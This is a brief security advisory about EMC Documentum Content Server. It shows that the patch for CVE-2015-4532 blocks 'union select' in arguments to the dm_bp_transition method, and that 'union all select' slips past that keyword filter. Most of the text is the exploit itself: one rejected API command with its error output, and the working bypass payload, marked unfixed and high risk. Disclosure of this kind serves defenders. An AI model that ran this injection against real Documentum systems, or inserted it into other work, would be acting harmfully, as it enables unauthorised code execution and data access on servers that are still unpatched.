EMC Documentum Content Server Code Execution

`Product: EMC Documentum Content Server  
Vendor: EMC  
Version: ANY  
CVE: N/A  
Risk: High  
Status: public/not fixed  
  
For detailed description see http://seclists.org/bugtraq/2015/Jul/51  
  
New behavior introduced in CVE-2015-4532:  
  
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='  
repo repo dmadmin "" 0000000000000000 0000000000000000  
0000000000000000 "0801fd08805c9dfe,'' union select r_object_id  
from dm_sysobject where r_object_id=''0801fd08805c9dfe"  
0000000000000000 0000000000000000 0000000000000000 ""  
0 0 T F T T dmadmin 0000000000000000'  
  
[DM_METHOD_E_METHOD_ARGS_INVALID]error:  
"The arguments being passed to the method 'dm_bp_transition' are   
invalid:  
arguments contain sql keywords which are not allowed."  
  
  
New attack vector (note ALL keyword):  
  
API> ?,c,execute do_method WITH METHOD='dm_bp_transition', ARGUMENTS='  
repo repo dmadmin "" 0000000000000000 0000000000000000  
0000000000000000 "0801fd08805c9dfe,'' union all select r_object_id  
from dm_sysobject where r_object_id=''0801fd08805c9dfe"  
0000000000000000 0000000000000000 0000000000000000 ""  
0 0 T F T T dmadmin 0000000000000000'  
  
__  
Regards,  
Andrey B. Panfilov   
`